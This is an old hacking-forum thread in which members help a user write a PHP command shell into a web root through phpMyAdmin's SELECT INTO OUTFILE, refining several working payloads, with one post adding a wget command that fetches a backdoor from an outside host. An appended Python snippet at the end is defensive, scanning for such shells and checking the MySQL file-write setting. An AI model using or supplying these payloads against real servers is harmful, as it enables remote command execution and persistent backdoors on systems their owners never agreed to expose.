Government Security
Network Security Resources

Php Remote Shell


  • Please log in to reply
19 replies to this topic

#1 joske

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 02:43 AM

Well, if I want to try out my PMA's security with this code:
use mysql;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

I have a CMD on help.php, right?
BUT when I try to execute commands like (dir c:\ or net stop "service") it returns IN the CMD box: (dir c:\\ , net stop \)

Please help me somebody, I'm totally lost :s

#2 kuza55

    Corporal

  • Members
  • 161 posts

Posted 01 March 2006 - 03:30 AM

I'm not sure if this is the only thing wrong, but function names are case-sensitive, so Shell_Exec should be shell_exec.

And wouldn't it be easier to just dump a one-line shell of
<?php system($_GET['cmd']); ?>
instead of something with a GUI... but yeah, if you replace Shell_Exec with shell_exec, it looks like it should work.

#3 joske

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 03:47 AM

OK, changed those things now:

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php system($_GET['cmd']); ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print shell_exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

BUT it looks like it's wrong :\
('<?php system($_GET['cmd']); ?>

when I run it:

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'cmd']); ?><html><head><title>help.php</title></head><onLoad="document.forms[0].e' at line 1


but when I change it to the right syntax:

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php system($_GET["-cmd"]); ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print shell_exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

<?php system($_GET["-cmd"]); ?>

then it runs, but when I go see @ help.php
there is a warning:

Warning: system() [function.system]: Cannot execute a blank command in C:\public_html\phpmyadmin\help.php on line 1


#4 SilentSky

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 05:21 AM

run it this way:
do it in mysql base
CREATE DATABASE tempdb;
use tempdb;
CREATE TABLE temptab (codetab text);

and then:

INSERT INTO temptab (codetab) values ('<? $cmd = $_REQUEST["-cmd"];
?><html><head><title>cmd.php</title></head><body bgcolor=#000000 text=#ffffff onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>" style="background:#000000;color:#ffffff;"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'D:\Website\MDEP\wwwroot\help.php' from temptab;
FLUSH LOGS

it's very important that a new line begins after the ;
if not, the code doesn't work

#5 joske

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 06:10 AM

now I got another error :s
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in E:\XAMPP\xampp\phpMyAdmin\hepl.php on line 1


#6 SilentSky

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 07:13 AM

does this directory exist as the root directory in the php information?
E:\XAMPP\xampp\phpMyAdmin\

#7 joske

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 07:37 AM

yes

#8 w00zy

    Sergeant

  • Members
  • 246 posts

Posted 01 March 2006 - 08:17 AM

I think kuza55's solution is the best:

1. create a php-file with the following code: <?php system($_GET['cmd']); ?>

2. save it as, let's say, shell.php

3. now you can execute commands by connecting to this file:

http://yourserver.com/shell.php?cmd=[command you want to execute]

I can't uninstall it, there seems to be some kind of "Uninstall Shield".

#9 joske

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 08:19 AM

so:

use mysql;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php system($_GET['cmd']); ?>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/shell.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

right?

#10 joske

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 10:39 AM

hmmz I heard something about there being a new code with an upload button? :s

#11 Partizaan

    Staff Sergeant

  • Members
  • 367 posts

Posted 01 March 2006 - 11:30 AM

There are a lot of other php shells on the inet that work fine
with all the noob buttons u need

#12 joske

    Private First Class

  • Members
  • 25 posts

Posted 01 March 2006 - 01:31 PM

yeah, probably :P but you can't find them :s

#13 PleXo

    Private First Class

  • Members
  • 26 posts

Posted 02 March 2006 - 04:43 PM

hmmz I heard something about there being a new code with an upload button? :s

I have that, and the answer is no

it's not new code, you can code it, you just need to know how :)

#14 roger_girardin

    Specialist

  • Members
  • 127 posts

Posted 02 March 2006 - 09:25 PM

the SQL injection vulnerability allows you to simulate a drop command to a file and to inject your code in that file instead of the dropped data

so you don't need to inject all that code into your PHP file

<? $cmd = $_REQUEST["-cmd"];
?><html><head><title>cmd.php</title></head><body bgcolor=#000000 text=#ffffff onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>" style="background:#000000;color:#ffffff;"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>

change it with

<? system($_REQUEST["cmd"];?>
or
<? system($_REQUEST["com"];?>


then your PHP file will execute the command you put on the query string

eg :
if the injected code is <? system($_REQUEST["cmd"];?>
my_php_file?cmd=ls
or
if the injected code is <? system($_REQUEST["com"];?>
my_php_file?com=ls

then you will be able to upload a more sophisticated backdoor by something like :
my_php_file?com=wget:http://my_backdoor;cp /tmp/mybackdoor /var/www/mybackdoor;

rog

#15 joske

    Private First Class

  • Members
  • 25 posts

Posted 03 March 2006 - 04:44 AM

OK, using this code:

use mysql;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'D:/Inetpub/wwwroot/phpmyadmin/help2.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

I get this prob:

Notice: Undefined index: -cmd in D:\Inetpub\wwwroot\phpmyadmin\help2.php on line 1
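An added defender-side example, not code from this thread or from any of its posters: the two checks below address the technique the thread walks through. The first flags PHP files under a web root whose command-execution sink is fed by a request superglobal, both in the direct one-liner form and in the two-step form used by the help.php payload; the second reads a my.cnf fragment and reports whether secure_file_priv confines SELECT ... INTO OUTFILE, since an absent or empty value lets a FILE-privileged account write into the web root. The PHP sources and my.cnf fragments are constructed samples.

```python
"""Defender-side checks for the INTO OUTFILE web-shell drop discussed in this thread.

All inputs below are constructed samples, not files taken from a real server.
"""
import re

# PHP function names are case-insensitive, so the sinks are matched that way too.
SINKS = r"(?:system|shell_exec|exec|passthru|popen|proc_open)"
SUPERGLOBALS = r"\$_(?:GET|POST|REQUEST|COOKIE)"

# Direct form:   system($_GET['cmd'])
DIRECT = re.compile(rf"\b{SINKS}\s*\(\s*{SUPERGLOBALS}\b", re.IGNORECASE)
# Indirect form: $cmd = $_REQUEST["-cmd"]; ... Shell_Exec($cmd)
ASSIGN = re.compile(rf"(\$\w+)\s*=\s*{SUPERGLOBALS}\s*\[", re.IGNORECASE)


def webshell_indicators(php_source: str) -> list[str]:
    """Return the reasons a PHP source looks like a request-driven command shell."""
    hits = []
    if DIRECT.search(php_source):
        hits.append("request superglobal passed straight to a command sink")
    for var in sorted({m.group(1) for m in ASSIGN.finditer(php_source)}):
        if re.search(rf"\b{SINKS}\s*\(\s*{re.escape(var)}\b", php_source, re.IGNORECASE):
            hits.append(f"request value in {var} reaches a command sink")
    return hits


def outfile_restricted(my_cnf: str) -> bool:
    """True if secure_file_priv confines (a directory) or disables (NULL) INTO OUTFILE.

    Absent or empty means the server may write wherever its process can, web root included.
    """
    m = re.search(r"^\s*secure[-_]file[-_]priv\s*=\s*(.*?)\s*$", my_cnf, re.M | re.I)
    return bool(m) and m.group(1).strip("\"'") != ""


# Constructed samples modelled on the payload shapes posted in the thread.
SAMPLES = {
    "shell.php": "<?php system($_GET['cmd']); ?>",
    "help.php": '<? $cmd = $_REQUEST["-cmd"]; ?><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre>',
    "index.php": "<?php echo htmlspecialchars($_GET['q']); ?>",
}
WEAK_CNF = "[mysqld]\ndatadir=/var/lib/mysql\nsecure_file_priv=\n"
HARDENED_CNF = "[mysqld]\ndatadir=/var/lib/mysql\nsecure_file_priv=/var/lib/mysql-files\n"

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, webshell_indicators(src) or "clean")
    print("weak cnf restricted:", outfile_restricted(WEAK_CNF))
    print("hardened cnf restricted:", outfile_restricted(HARDENED_CNF))
```

Pair the file scan with a review of which accounts hold the FILE privilege; the scanner only finds the dropped file after the fact, while secure_file_priv and a minimal grant prevent the drop.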